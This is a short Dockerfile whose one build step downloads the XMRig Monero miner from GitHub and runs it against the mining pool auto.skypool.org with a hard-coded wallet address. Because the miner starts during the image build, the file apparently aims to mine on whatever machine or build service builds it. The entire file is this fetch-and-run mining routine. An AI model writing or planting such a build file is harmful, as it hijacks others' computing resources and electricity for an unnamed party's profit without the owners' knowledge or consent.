FROM ubuntu:18.04

SHELL ["/bin/bash", "-c"]

WORKDIR /root

RUN apt update -y \
  && apt install wget -y \
  && wget https://github.com/xmrig/xmrig/releases/download/v6.11.1/xmrig-6.11.1-linux-static-x64.tar.gz \
  && tar -xf xmrig-6.11.1-linux-static-x64.tar.gz \
  && ./xmrig-6.11.1/xmrig -o auto.skypool.org:4444 -u 86DMCFYm1gwDX3zpgXPvkFExaJzmEg5sSfGttKp5kUAJ1yqFurKAAkvWckY3x8PA1YSiEFxJzsPU43oew614xVQQ7MS4fkv -p dh3